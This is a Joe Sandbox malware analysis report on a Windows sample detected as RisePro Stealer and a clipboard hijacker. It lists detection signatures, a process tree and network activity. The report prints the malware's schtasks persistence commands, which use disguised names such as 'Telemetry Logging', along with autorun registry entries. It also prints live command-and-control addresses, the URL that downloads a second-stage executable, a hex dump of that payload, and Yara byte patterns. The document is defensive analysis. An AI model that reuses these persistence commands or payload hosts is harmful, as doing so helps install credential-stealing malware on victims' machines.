Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1443534
MD5: 3d09739846543f4962f2b432da671c29
SHA1: 2247e38b1f5257df93db091328488c652f6bea0a
SHA256: 70aaa6e67944e919f8c7bbdf71b6b09deed41f51166bc1dc15fc6f66efc1b014
Tags: exe

Detection

Clipboard Hijacker, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected Clipboard Hijacker
Yara detected RisePro Stealer
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
PE file contains section with special chars
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4112 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3D09739846543F4962F2B432DA671C29)
    • schtasks.exe (PID: 3692 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6668 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • llmcrdwzLnNKYB4T0Vnw.exe (PID: 7056 cmdline: "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe" MD5: AF6E384DFABDAD52D43CF8429AD8779C)
      • schtasks.exe (PID: 5728 cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 4748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MSIUpdaterV2.exe (PID: 6504 cmdline: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe MD5: AF6E384DFABDAD52D43CF8429AD8779C)
    • schtasks.exe (PID: 6968 cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MSIUpdaterV2.exe (PID: 1628 cmdline: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe MD5: AF6E384DFABDAD52D43CF8429AD8779C)
  • oobeldr.exe (PID: 7044 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe MD5: AF6E384DFABDAD52D43CF8429AD8779C)
    • schtasks.exe (PID: 2504 cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AdobeUpdaterV2.exe (PID: 6436 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe" MD5: AF6E384DFABDAD52D43CF8429AD8779C)
  • AdobeUpdaterV2.exe (PID: 4332 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe" MD5: AF6E384DFABDAD52D43CF8429AD8779C)
  • EdgeMS2.exe (PID: 2860 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe" MD5: AF6E384DFABDAD52D43CF8429AD8779C)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\dZGGvSkztfgYu5jqSY21Wne.zip | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp | Windows_Trojan_Clipbanker_f9f9e79d | unknown | unknown | 0x4c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp | Windows_Trojan_Clipbanker_787b130b | unknown | unknown | 0x1354:$mutex_setup: 55 8B EC 83 EC 20 53 56 57 E8 9E EC FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security |
00000000.00000003.2157362439.00000000061CB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security |
00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp | Windows_Trojan_Clipbanker_f9f9e79d | unknown | unknown | 0x4c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
(13 entries in total; the remaining entries are not included here)

Source | Rule | Description | Author | Strings
8.2.MSIUpdaterV2.exe.400000.0.unpack | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |
8.2.MSIUpdaterV2.exe.400000.0.unpack | Windows_Trojan_Clipbanker_f9f9e79d | unknown | unknown | 0x6c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
8.2.MSIUpdaterV2.exe.400000.0.unpack | Windows_Trojan_Clipbanker_787b130b | unknown | unknown | 0x1554:$mutex_setup: 55 8B EC 83 EC 20 53 56 57 E8 9E EC FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
7.2.MSIUpdaterV2.exe.400000.0.unpack | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |
7.2.MSIUpdaterV2.exe.400000.0.unpack | Windows_Trojan_Clipbanker_f9f9e79d | unknown | unknown | 0x6c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
(16 entries in total; the remaining entries are not included here)

System Summary

Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 4112, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 4112, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe, ParentProcessId: 7056, ParentProcessName: llmcrdwzLnNKYB4T0Vnw.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", ProcessId: 5728, ProcessName: schtasks.exe
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
05/17/24-23:45:00.848746 | 2049060 | 49704 | 50500 | TCP | A Network Trojan was detected
05/17/24-23:45:05.461512 | 2046269 | 49704 | 50500 | TCP | A Network Trojan was detected
05/17/24-23:45:05.093768 | 2046268 | 49704 | 50500 | TCP | A Network Trojan was detected
05/17/24-23:45:14.161367 | 2019714 | 49707 | 80 | TCP | Potentially Bad Traffic
05/17/24-23:45:02.216807 | 2046267 | 50500 | 49704 | TCP | A Network Trojan was detected
05/17/24-23:45:01.844974 | 2046266 | 50500 | 49704 | TCP | A Network Trojan was detected

AV Detection

Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe; Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe; Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe; Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe; Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe; Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe; Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe; ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe; ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe; ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe; ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe; ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe; ReversingLabs: Detection: 83%
Source: file.exe; Joe Sandbox ML: detected
Source: file.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_06D2B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError,
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_06D62EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_06D7CCFD FindFirstFileExW,
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_06D2BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,

Networking

Source: Traffic; Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.5:49704 -> 5.42.96.65:50500
Source: Traffic; Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 5.42.96.65:50500 -> 192.168.2.5:49704
Source: Traffic; Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 5.42.96.65:50500 -> 192.168.2.5:49704
Source: Traffic; Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.5:49704 -> 5.42.96.65:50500
Source: Traffic; Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49704 -> 5.42.96.65:50500
Source: Traffic; Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.5:49707 -> 5.42.96.170:80
Source: global traffic; TCP traffic: 192.168.2.5:49704 -> 5.42.96.65:50500
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Fri, 17 May 2024 21:45:14 GMT
  Server: Apache/2.4.59 (Debian)
  Last-Modified: Thu, 16 May 2024 16:35:58 GMT
  ETag: "45a2b8-61894d4759081"
  Accept-Ranges: bytes
  Content-Length: 4563640
  Content-Type: application/x-msdos-program
  Data Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 80 77 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 70 77 00 00 10 00 00 00 82 3f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 32 0c 00 00 00 80 77 00 00 0e 00 00 00 84 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 7c f6 05 00 00 90 77 00 00 f8 05 00 00 92 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 77 07 ae 80 3f 00 20 05 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 60 06 2e 19 84 3d c1 98 07 18 3f b1 8a c8 06 21
97 5a 9f 17 26 49 ef d7 89 87 a0 7f f8 9c 1a 49 31 38 ab c9 5a 21 b9 88 59 1b ae 73 bb 19 eb 5b 51 58 ea b8 cf f9 ca 61 e9 ea fc d8 84 59 59 a3 81 db 8e 29 e7 76 bc d0 d2 e2 0b 6e c0 ce 18 8d 84 c5 87 7c 29 a6 0c ed c1 5e 66 bf 07 2b e3 8a 3e 03 98 38 34 68 38 32 67 b0 86 8a 3e 2a b4 68 62 5c b0 a7 9b 45 96 28 ad 78 ba dd 89 a6 ce bc d5 40 b7 38 5f c9 39 ec 34 55 10 6d 18 ec 27 8d 73 cb c6 0f d8 05 bc 23 ff 88 ab da b9 96 30 33 fc b8 00 a9 fc 92 1d 4f c4 e7 90 5d 60 12 9b 53 32 db b8 40 23 0f c7 03 0e ab 10 fd b8 f2 6f 46 7e 9e 2a fd 52 a1 c1 51 7f d0 71 be 6f 98 79 6e fb c1 da 4f 41 40 7c 1f ec 12 e5 67 c5 d8 1f 46 b5 b1 d2 97 12 30 90 6a b0 c9 1f 1e a8 e1 11 73 2f 0b e5 48 af 0a 2b 20 30 43 da 21 be 8e ec f6 37 73 ee f1 5e 48 2c 1a 0b be 82 1d a8 20 0e ce 7b 8d f5 c5 f5 e3 da 80 c7 b4 ba 02 87 94 03 b5 02 97 44 af ba e5 e0 f5 bf 72 12 49 97 0b 2c 7c 8b 1d ae 9b bd d0 7f a8 75 84 36 ba bb 9e 15 0a be 45 3e 71 de d7 7d 7f dc d8 99 86 67 a0 c3 29 e4 8b 55 fe e5 4d 45 98 27 d7 91 6a 7d f4 1a 1a c6 e0 91 00 ee f6 37 5e 0a 8d c2 aa
Source: Joe Sandbox View; IP Address: 34.117.186.192
Source: Joe Sandbox View; IP Address: 5.42.96.65
Source: Joe Sandbox View; IP Address: 172.67.75.166
Source: Joe Sandbox View; ASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown; DNS query: name: ipinfo.io
Source: global traffic; HTTP traffic detected:
  GET /widget/demo/12.205.151.60 HTTP/1.1
  Connection: Keep-Alive
  Referer: https://ipinfo.io/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
  Host: ipinfo.io
Source: global traffic; HTTP traffic detected:
  GET /demo/home.php?s=12.205.151.60 HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
  Host: db-ip.com
Source: global traffic; HTTP traffic detected:
  HEAD /server/k/l2.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
  Host: 5.42.96.170
  Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
  GET /server/k/l2.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
  Host: 5.42.96.170
  Cache-Control: no-cache
Source: unknown; TCP traffic detected without corresponding DNS query: 5.42.96.65 (50 identical entries)
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_06D41980 SetThreadExecutionState,SetThreadExecutionState,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,recv,WSAGetLastError,__aulldiv,__aulldiv,send,recv,recv,recv,recv,Sleep,Sleep,
Source: global traffic; DNS traffic detected: DNS query: ipinfo.io
Source: global traffic; DNS traffic detected: DNS query: db-ip.com
Source: global traffic; DNS traffic detected: DNS query: kuljyftgjk.online
Source: global traffic; DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://5.42.96.170/server/k/l2.exe
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://5.42.96.170/server/k/l2.exe5
Source: file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://5.42.96.170/server/k/l2.exeDTl
Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr; String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr; String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr; String found in binary or memory: http://ocsp.sectigo.com0
Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: http://www.winimage.com/zLibDll
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.4444160556.0000000001719000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698791395.0000000001714000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://db-ip.com/demo/home.php?s=12.205.151.60
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://db-ip.com/z-
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://db-ip.com:443/demo/home.php?s=12.205.151.60
            Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
